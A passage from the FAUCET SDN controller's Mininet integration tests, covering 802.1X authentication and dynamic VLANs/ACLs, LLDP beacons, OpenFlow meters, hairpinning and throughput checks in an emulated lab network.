require_host_learned=False, expected_result=False)
def port_up(port):
self.set_port_up(port)
self.wait_8021x_flows(port)
tcpdump_filter = 'ether proto 0x888e'
tcpdump_txt = self.tcpdump_helper(
self.eapol1_host, tcpdump_filter, [
lambda: port_up(port_no1)],
timeout=80, vflags='-vvv', packets=10)
for req_str in (
'len 5, Request (1)', # assume that this is the identity request
'Identity: user', # supplicant replies with username
'Success', # supplicant success
):
self.assertTrue(req_str in tcpdump_txt)
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True, retries=10)
self.post_test_checks()
class Faucet8021XPeriodicReauthTest(Faucet8021XBaseTest):
SESSION_TIMEOUT = 15
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_labels1 = self.port_labels(port_no1)
self.set_port_up(port_no1)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
last_total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels1, default=0)
for _ in range(4):
for _ in range(self.SESSION_TIMEOUT * 2):
total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels1, default=0)
if total > last_total:
break
time.sleep(1)
self.assertGreater(total, last_total, msg='failed to successfully re-auth')
last_total = total
self.post_test_checks()
class Faucet8021XConfigReloadTest(Faucet8021XBaseTest):
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
self.wait_8021x_flows(port_no1)
self.wait_8021x_flows(port_no2)
conf = self._get_faucet_conf()
conf['dps'][self.DP_NAME]['interfaces'][port_no1]['dot1x'] = False
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=True)
self.wait_8021x_flows(port_no2)
self.post_test_checks()
class Faucet8021XCustomACLLoginTest(Faucet8021XBaseTest):
"""Ensure that 8021X Port ACLs Work before and after Login"""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
auth_acl:
- rule:
dl_type: 0x800 # Allow ICMP / IPv4
ip_proto: 1
actions:
allow: True
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
noauth_acl:
- rule:
dl_type: 0x800 # Deny ICMP / IPv4
ip_proto: 1
actions:
allow: False
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
"""
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
auth_acl: auth_acl
noauth_acl: noauth_acl
interfaces:
%(port_1)d:
name: b1
description: "b1"
native_vlan: 100
# 802.1x client.
dot1x: True
dot1x_acl: True
%(port_2)d:
name: b2
description: "b2"
native_vlan: 100
# 802.1X client.
dot1x: True
dot1x_acl: True
%(port_3)d:
name: b3
description: "b3"
native_vlan: 100
# ping host.
%(port_4)d:
name: b4
description: "b4"
output_only: True
# "NFV host - interface used by controller."
"""
def test_untagged(self):
self.verify_host_success(
self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, False)
self.post_test_checks()
class Faucet8021XCustomACLLogoutTest(Faucet8021XCustomACLLoginTest):
"""Ensure that 8021X Port ACLs Work before and after Logout"""
def test_untagged(self):
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, and_logoff=True))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XMABTest(Faucet8021XSuccessTest):
"""Ensure that 802.1x Port Supports Mac Auth Bypass."""
DOT1X_EXPECTED_EVENTS = [{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC',
'status': 'success'}},
]
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
native_vlan: 100
# 802.1x client.
dot1x: True
dot1x_mab: True
%(port_2)d:
native_vlan: 100
# 802.1X client.
dot1x: True
%(port_3)d:
native_vlan: 100
# ping host.
%(port_4)d:
output_only: True
# "NFV host - interface used by controller."
"""
def start_freeradius(self):
# Add the host mac address to the FreeRADIUS config
self.freeradius_user_conf += '\n{0} Cleartext-Password := "{0}"'.format(
str(self.eapol1_host.MAC()).replace(':', '')
)
return super(Faucet8021XMABTest, self).start_freeradius()
@staticmethod
def dhclient_callback(host, timeout):
dhclient_cmd = 'dhclient -d -1 %s' % host.defaultIntf()
return host.cmd(mininet_test_util.timeout_cmd(dhclient_cmd, timeout), verbose=True)
def test_untagged(self):
port_no1 = self.port_map['port_1']
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.dhclient_callback(self.eapol1_host, 10)
self.wait_until_matching_lines_from_file(r'.*AAA_SUCCESS.*', self.env['faucet']['FAUCET_LOG'])
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.assertEqual(
1,
self.scrape_prometheus_var('port_dot1x_success_total', labels=self.port_labels(port_no1), default=0))
self.post_test_checks()
class Faucet8021XDynACLLoginTest(Faucet8021XCustomACLLoginTest):
"""Ensure that 8021X Port ACLs Work before and after Logout"""
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_2', 'eth_src': 'HOST2_MAC', 'status': 'success'}},
]
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="filter_id_user_accept"
password="accept_pass"
}
"""
wpasupplicant_conf_2 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="filter_id_user_deny"
password="deny_pass"
}
"""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
accept_acl:
dot1x_assigned: True
rules:
- rule:
dl_type: 0x800 # Allow ICMP / IPv4
ip_proto: 1
actions:
allow: True
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
deny_acl:
dot1x_assigned: True
rules:
- rule:
dl_type: 0x800 # Deny ICMP / IPv4
ip_proto: 1
actions:
allow: False
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
"""
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
name: b1
description: "b1"
native_vlan: 100
# 802.1x client.
dot1x: True
dot1x_dyn_acl: True
%(port_2)d:
name: b2
description: "b2"
native_vlan: 100
# 802.1X client.
dot1x: True
dot1x_dyn_acl: True
%(port_3)d:
name: b3
description: "b3"
native_vlan: 100
# ping host.
%(port_4)d:
name: b4
description: "b4"
output_only: True
# "NFV host - interface used by controller."
"""
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.one_ipv4_ping(self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.assertTrue(self.try_8021x(
self.eapol2_host, port_no2, self.wpasupplicant_conf_2, and_logoff=False))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.one_ipv4_ping(self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XDynACLLogoutTest(Faucet8021XDynACLLoginTest):
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'logoff'}}
]
def test_untagged(self):
port_no1 = self.port_map['port_1']
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=True))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XVLANTest(Faucet8021XSuccessTest):
"""Test that two hosts are put into vlans.
Same VLAN, Logoff, diff VLANs, port flap."""
CONFIG_GLOBAL = """vlans:
100:
vid: 100
description: "untagged"
radiusassignedvlan1:
vid: %u
description: "untagged"
dot1x_assigned: True
radiusassignedvlan2:
vid: %u
description: "untagged"
dot1x_assigned: True
""" % (mininet_test_base.MAX_TEST_VID - 1,
mininet_test_base.MAX_TEST_VID)
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
native_vlan: 100
# 802.1x client.
dot1x: True
%(port_2)d:
native_vlan: 100
# 802.1X client.
dot1x: True
%(port_3)d:
native_vlan: radiusassignedvlan1
# ping host.
%(port_4)d:
output_only: True
# "NFV host - interface used by controller."
"""
RADIUS_PORT = 1940
DOT1X_EXPECTED_EVENTS = []
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="vlanuser1001"
password="password"
}
"""
wpasupplicant_conf_2 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="vlanuser2222"
password="milliphone"
}
"""
def test_untagged(self):
vid = 100 ^ mininet_test_base.OFPVID_PRESENT
radius_vid1 = (mininet_test_base.MAX_TEST_VID - 1) ^ mininet_test_base.OFPVID_PRESENT
radius_vid2 = mininet_test_base.MAX_TEST_VID ^ mininet_test_base.OFPVID_PRESENT
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
port_no3 = self.port_map['port_3']
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.wait_until_matching_flow(
{'in_port': port_no1},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % radius_vid1])
self.wait_until_matching_flow(
{'vlan_vid': radius_vid1},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no3])
self.wait_until_matching_flow(
{'vlan_vid': vid},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no2])
self.wait_until_no_matching_flow(
{'vlan_vid': radius_vid2},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no2])
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=True))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
# check ports are back in the right vlans.
self.wait_until_no_matching_flow(
{'in_port': port_no1},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % radius_vid1])
self.wait_until_matching_flow(
{'in_port': port_no1},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % vid])
# check flood ports are in the right vlans
self.wait_until_no_matching_flow(
{'vlan_vid': radius_vid1},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no3])
self.wait_until_matching_flow(
{'vlan_vid': vid},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no2])
# check two 1x hosts play nicely. (same dyn vlan)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.one_ipv4_ping(
self.eapol1_host, self.eapol2_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol2_host, port_no2, self.wpasupplicant_conf_1, and_logoff=False))
self.one_ipv4_ping(
self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.one_ipv4_ping(
self.eapol2_host, self.eapol1_host.IP(),
require_host_learned=False, expected_result=True)
# check two 1x hosts dont play (diff dyn vlan).
self.assertTrue(self.try_8021x(
self.eapol2_host, port_no2, self.wpasupplicant_conf_2, and_logoff=False))
self.one_ipv4_ping(
self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.one_ipv4_ping(
self.eapol2_host, self.eapol1_host.IP(),
require_host_learned=False, expected_result=False)
# move host1 to new VLAN
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_2, and_logoff=False))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.one_ipv4_ping(
self.eapol1_host, self.eapol2_host.IP(),
require_host_learned=False, expected_result=True)
self.wait_until_no_matching_flow(
{'eth_src': self.eapol1_host.MAC(),
'vlan_vid': vid},
table_id=self._ETH_SRC_TABLE)
self.wait_until_no_matching_flow(
{'eth_src': self.eapol1_host.MAC(),
'vlan_vid': radius_vid1},
table_id=self._ETH_SRC_TABLE)
self.wait_until_matching_flow(
{'eth_src': self.eapol1_host.MAC(),
'vlan_vid': radius_vid2},
table_id=self._ETH_SRC_TABLE)
self.wait_until_no_matching_flow(
{'eth_dst': self.eapol1_host.MAC(),
'vlan_vid': vid},
table_id=self._ETH_DST_TABLE)
self.wait_until_no_matching_flow(
{'eth_dst': self.eapol1_host.MAC(),
'vlan_vid': radius_vid1},
table_id=self._ETH_DST_TABLE)
self.wait_until_matching_flow(
{'eth_dst': self.eapol1_host.MAC(),
'vlan_vid': radius_vid2},
table_id=self._ETH_DST_TABLE)
# test port up/down. removes the dynamic vlan & host cache.
self.flap_port(port_no2)
self.wait_until_no_matching_flow(
{'eth_src': self.eapol2_host.MAC()},
table_id=self._ETH_SRC_TABLE)
self.wait_until_no_matching_flow(
{'eth_dst': self.eapol2_host.MAC(),
'vlan_vid': radius_vid1},
table_id=self._ETH_DST_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no2])
# check ports are back in the right vlans.
self.wait_until_no_matching_flow(
{'in_port': port_no2},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % radius_vid2])
self.wait_until_matching_flow(
{'in_port': port_no2},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % vid])
# check flood ports are in the right vlans
self.wait_until_no_matching_flow(
{'vlan_vid': radius_vid2},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no2])
self.wait_until_matching_flow(
{'vlan_vid': vid},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no2])
self.post_test_checks()
class FaucetUntaggedRandomVidTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
randvlan:
vid: 100
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: randvlan
%(port_2)d:
native_vlan: randvlan
%(port_3)d:
native_vlan: randvlan
%(port_4)d:
native_vlan: randvlan
"""
def test_untagged(self):
last_vid = None
for _ in range(5):
vid = random.randint(2, mininet_test_base.MAX_TEST_VID)
if vid == last_vid:
continue
self.change_vlan_config(
'randvlan', 'vid', vid, cold_start=True, hup=True)
self.ping_all_when_learned()
last_vid = vid
class FaucetUntaggedNoCombinatorialFlood(FaucetUntaggedTest):
CONFIG = """
combinatorial_port_flood: False
""" + CONFIG_BOILER_UNTAGGED
class FaucetUntaggedControllerNfvTest(FaucetUntaggedTest):
# Name of switch interface connected to last host, accessible to controller.
last_host_switch_intf = None
def _init_faucet_config(self):
last_host = self.hosts_name_ordered()[-1]
switch = self.first_switch()
last_host_switch_link = switch.connectionsTo(last_host)[0]
self.last_host_switch_intf = [intf for intf in last_host_switch_link if intf in switch.intfList()][0]
# Now that interface is known, FAUCET config can be written to include it.
super(FaucetUntaggedControllerNfvTest, self)._init_faucet_config()
def test_untagged(self):
super(FaucetUntaggedControllerNfvTest, self).test_untagged()
# Confirm controller can see switch interface with traffic.
ifconfig_output = self.net.controllers[0].cmd('ifconfig %s' % self.last_host_switch_intf)
self.assertTrue(
re.search('(R|T)X packets[: ][1-9]', ifconfig_output),
msg=ifconfig_output)
class FaucetUntaggedBroadcastTest(FaucetUntaggedTest):
def test_untagged(self):
super(FaucetUntaggedBroadcastTest, self).test_untagged()
self.verify_broadcast()
self.verify_no_bcast_to_self()
self.verify_unicast_not_looped()
class FaucetUntaggedNSLoopTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
acls:
nsonly:
- rule:
dl_type: %u
ip_proto: 58
icmpv6_type: 135
actions:
allow: 1
- rule:
actions:
allow: 0
vlans:
100:
description: "untagged"
""" % IPV6_ETH
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: nsonly
%(port_2)d:
native_vlan: 100
acl_in: nsonly
%(port_3)d:
native_vlan: 100
acl_in: nsonly
%(port_4)d:
native_vlan: 100
acl_in: nsonly
"""
def test_untagged(self):
self.verify_no_bcast_to_self()
class FaucetUntaggedNoCombinatorialBroadcastTest(FaucetUntaggedBroadcastTest):
CONFIG = """
combinatorial_port_flood: False
""" + CONFIG_BOILER_UNTAGGED
class FaucetExperimentalAPITest(FaucetUntaggedTest):
"""Test the experimental Faucet API."""
CONTROLLER_CLASS = mininet_test_topo.FaucetExperimentalAPI
results_file = None
def _set_static_vars(self):
super(FaucetExperimentalAPITest, self)._set_static_vars()
self._set_var_path('faucet', 'API_TEST_RESULT', 'result.txt')
self.results_file = self.env['faucet']['API_TEST_RESULT']
def test_untagged(self):
self.wait_until_matching_lines_from_file(r'.*pass.*', self.results_file)
class FaucetUntaggedLogRotateTest(FaucetUntaggedTest):
def test_untagged(self):
faucet_log = self.env['faucet']['FAUCET_LOG']
self.assertTrue(os.path.exists(faucet_log))
os.rename(faucet_log, faucet_log + '.old')
self.assertTrue(os.path.exists(faucet_log + '.old'))
self.flap_all_switch_ports()
self.assertTrue(os.path.exists(faucet_log))
class FaucetUntaggedLLDPTest(FaucetUntaggedTest):
CONFIG = """
lldp_beacon:
send_interval: 5
max_per_interval: 5
interfaces:
%(port_1)d:
native_vlan: 100
lldp_beacon:
enable: True
system_name: "faucet"
port_descr: "first_port"
org_tlvs:
- {oui: 0x12bb, subtype: 2, info: "01406500"}
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
@staticmethod
def wireshark_payload_format(payload_str):
formatted_payload_str = ''
groupsize = 4
for payload_offset in range(len(payload_str) // groupsize):
char_count = payload_offset * 2
if char_count % 0x10 == 0:
formatted_payload_str += '0x%4.4x: ' % char_count
payload_fragment = payload_str[payload_offset * groupsize:][:groupsize]
formatted_payload_str += ' ' + payload_fragment
return formatted_payload_str
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = 'ether proto 0x88cc'
timeout = 5 * 3
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [
lambda: first_host.cmd('sleep %u' % timeout)],
timeout=timeout, vflags='-vv', packets=1)
oui_prefix = ''.join(self.FAUCET_MAC.split(':')[:3])
faucet_lldp_dp_id_attr = '%2.2x' % 1
expected_lldp_dp_id = ''.join((
oui_prefix,
faucet_lldp_dp_id_attr,
binascii.hexlify(str(self.dpid).encode('UTF-8')).decode()))
for lldp_required in (
r'%s > 01:80:c2:00:00:0e, ethertype LLDP' % self.FAUCET_MAC,
r'Application type \[voice\] \(0x01\), Flags \[Tagged\]Vlan id 50',
r'System Name TLV \(5\), length 6: faucet',
r'Port Description TLV \(4\), length 10: first_port',
self.wireshark_payload_format(expected_lldp_dp_id)):
self.assertTrue(
re.search(lldp_required, tcpdump_txt),
msg='%s: %s' % (lldp_required, tcpdump_txt))
class FaucetUntaggedLLDPDefaultFallbackTest(FaucetUntaggedTest):
CONFIG = """
lldp_beacon:
send_interval: 5
max_per_interval: 5
interfaces:
%(port_1)d:
native_vlan: 100
lldp_beacon:
enable: True
org_tlvs:
- {oui: 0x12bb, subtype: 2, info: "01406500"}
"""
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = 'ether proto 0x88cc'
timeout = 5 * 3
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [
lambda: first_host.cmd('sleep %u' % timeout)],
timeout=timeout, vflags='-vv', packets=1)
for lldp_required in (
r'%s > 01:80:c2:00:00:0e, ethertype LLDP' % self.FAUCET_MAC,
r'Application type \[voice\] \(0x01\), Flags \[Tagged\]Vlan id 50',
r'System Name TLV \(5\), length 8: faucet-1',
r'Port Description TLV \(4\), length [1-9]: b%u' % self.port_map['port_1']):
self.assertTrue(
re.search(lldp_required, tcpdump_txt),
msg='%s: %s' % (lldp_required, tcpdump_txt))
class FaucetUntaggedMeterParseTest(FaucetUntaggedTest):
REQUIRES_METERS = True
OVS_TYPE = 'user'
CONFIG_GLOBAL = """
meters:
lossymeter:
meter_id: 1
entry:
flags: "KBPS"
bands:
[
{
type: "DROP",
rate: 100
}
]
acls:
lossyacl:
- rule:
actions:
meter: lossymeter
allow: 1
vlans:
100:
description: "untagged"
"""
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 5
db: 'stats_file'
port_state:
dps: ['%s']
type: 'port_state'
interval: 5
db: 'state_file'
meter_stats:
dps: ['%s']
type: 'meter_stats'
interval: 5
db: 'meter_file'
meter_stats_prom:
dps: ['%s']
type: 'meter_stats'
db: 'prometheus'
interval: 5
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME, self.DP_NAME)
GAUGE_CONFIG_DBS = """
prometheus:
type: 'prometheus'
prometheus_addr: '::1'
prometheus_port: %(gauge_prom_port)d
"""
config_ports = {'gauge_prom_port': None}
def get_gauge_config(self, faucet_config_file,
monitor_stats_file,
monitor_state_file,
monitor_meter_stats_file):
"""Build Gauge config."""
return """
faucet_configs:
- %s
watchers:
%s
dbs:
stats_file:
type: 'text'
file: %s
state_file:
type: 'text'
file: %s
meter_file:
type: 'text'
file: %s
%s
""" % (faucet_config_file, self.get_gauge_watcher_config(),
monitor_stats_file, monitor_state_file, monitor_meter_stats_file,
self.GAUGE_CONFIG_DBS)
def _init_gauge_config(self):
gauge_config = self.get_gauge_config(
self.faucet_config_path,
self.monitor_stats_file,
self.monitor_state_file,
self.monitor_meter_stats_file)
if self.config_ports:
gauge_config = gauge_config % self.config_ports
self._write_yaml_conf(self.gauge_config_path, yaml.safe_load(gauge_config))
def test_untagged(self):
"""All hosts on the same untagged VLAN should have connectivity."""
# TODO: userspace DP port status not reliable.
self.ping_all_when_learned()
class FaucetUntaggedApplyMeterTest(FaucetUntaggedMeterParseTest):
CONFIG = """
interfaces:
%(port_1)d:
acl_in: lossyacl
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
super(FaucetUntaggedApplyMeterTest, self).test_untagged()
first_host, second_host = self.hosts_name_ordered()[:2]
error('metered ping flood: %s' % first_host.cmd(
'ping -c 1000 -f %s' % second_host.IP()))
# Require meter band bytes to match.
self.wait_until_matching_lines_from_file(
r'.+faucet-1-1-byte-band-count.+[1-9].+',
self.monitor_meter_stats_file)
meter_labels = {
'dp_id': self.dpid,
'dp_name': self.DP_NAME,
'meter_id': 1
}
byte_band_count = self.scrape_prometheus_var(
'of_meter_byte_band_count', labels=meter_labels, controller='gauge')
self.assertTrue(byte_band_count)
class FaucetUntaggedMeterAddTest(FaucetUntaggedMeterParseTest):
def test_untagged(self):
super(FaucetUntaggedMeterAddTest, self).test_untagged()
conf = self._get_faucet_conf()
del conf['acls']
conf['meters']['lossymeter2'] = {
'meter_id': 2,
'entry': {
'flags': ['PKTPS'],
'bands': [{'rate': '1000', 'type': 'DROP'}]
},
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=True, hup=True)
self.wait_until_matching_lines_from_file(
r'.+\'meter_id\'\: 2+',
self.get_matching_meters_on_dpid(self.dpid))
class FaucetUntaggedMeterDeleteTest(FaucetUntaggedMeterParseTest):
def test_untagged(self):
super(FaucetUntaggedMeterDeleteTest, self).test_untagged()
conf = self._get_faucet_conf()
del conf['meters']['lossymeter']
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=True)
self.wait_until_no_matching_lines_from_file(
r'.+meter_id+',
self.get_matching_meters_on_dpid(self.dpid))
class FaucetUntaggedMeterModTest(FaucetUntaggedMeterParseTest):
def test_untagged(self):
super(FaucetUntaggedMeterModTest, self).test_untagged()
conf = self._get_faucet_conf()
del conf['acls']
conf['meters']['lossymeter'] = {
'meter_id': 1,
'entry': {
'flags': ['PKTPS'],
'bands': [{'rate': '1000', 'type': 'DROP'}]
},
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=True, hup=True)
self.wait_until_matching_lines_from_file(
r'.+PKTPS+',
self.get_matching_meters_on_dpid(self.dpid))
class FaucetUntaggedHairpinTest(FaucetUntaggedTest):
NETNS = True
CONFIG = """
interfaces:
%(port_1)d:
hairpin: True
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Create macvlan interfaces, with one in a separate namespace,
# to force traffic between them to be hairpinned via FAUCET.
first_host, second_host = self.hosts_name_ordered()[:2]
macvlan1_intf = 'macvlan1'
macvlan1_ipv4 = '10.0.0.100'
macvlan2_intf = 'macvlan2'
macvlan2_ipv4 = '10.0.0.101'
self.add_macvlan(first_host, macvlan1_intf, ipa=macvlan1_ipv4, mode='vepa')
self.add_macvlan(first_host, macvlan2_intf, mode='vepa')
macvlan2_mac = self.get_host_intf_mac(first_host, macvlan2_intf)
netns = self.hostns(first_host)
setup_cmds = []
setup_cmds.extend(
['ip link set %s netns %s' % (macvlan2_intf, netns)])
for exec_cmd in (
('ip address add %s/24 brd + dev %s' % (
macvlan2_ipv4, macvlan2_intf),
'ip link set %s up' % macvlan2_intf)):
setup_cmds.append('ip netns exec %s %s' % (netns, exec_cmd))
self.quiet_commands(first_host, setup_cmds)
self.one_ipv4_ping(first_host, macvlan2_ipv4, intf=macvlan1_ipv4)
self.one_ipv4_ping(first_host, second_host.IP())
# Verify OUTPUT:IN_PORT flood rules are exercised.
self.wait_nonzero_packet_count_flow(
{'in_port': self.port_map['port_1'],
'dl_dst': 'ff:ff:ff:ff:ff:ff'},
table_id=self._FLOOD_TABLE, actions=['OUTPUT:IN_PORT'])
self.wait_nonzero_packet_count_flow(
{'in_port': self.port_map['port_1'],
'dl_dst': macvlan2_mac},
table_id=self._ETH_DST_HAIRPIN_TABLE, actions=['OUTPUT:IN_PORT'])
class FaucetUntaggedGroupHairpinTest(FaucetUntaggedHairpinTest):
CONFIG = """
group_table: True
interfaces:
%(port_1)d:
hairpin: True
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetUntaggedTcpIPv4IperfTest(FaucetUntaggedTest):
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_ip = ipaddress.ip_address(first_host.IP())
second_host_ip = ipaddress.ip_address(second_host.IP())
for _ in range(3):
self.ping_all_when_learned()
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
self.flap_all_switch_ports()
class FaucetUntaggedTcpIPv6IperfTest(FaucetUntaggedTest):
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_ip = ipaddress.ip_interface('fc00::1:1/112')
second_host_ip = ipaddress.ip_interface('fc00::1:2/112')
self.add_host_ipv6_address(first_host, first_host_ip)
self.add_host_ipv6_address(second_host, second_host_ip)
for _ in range(3):
self.ping_all_when_learned()
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip.ip, second_host_ip.ip,
sync_counters_func=lambda: self.one_ipv6_ping(first_host, second_host_ip.ip))
self.flap_all_switch_ports()
class FaucetSanityTest(FaucetUntaggedTest):
"""Sanity test - make sure test environment is correct before running all tess."""
def verify_dp_port_healthy(self, dp_port, retries=5, min_mbps=MIN_MBPS):
for _ in range(retries):
port_desc = self.get_port_desc_from_dpid(self.dpid, dp_port)
port_name = port_desc['name']
port_state = port_desc['state']
port_config = port_desc['config']
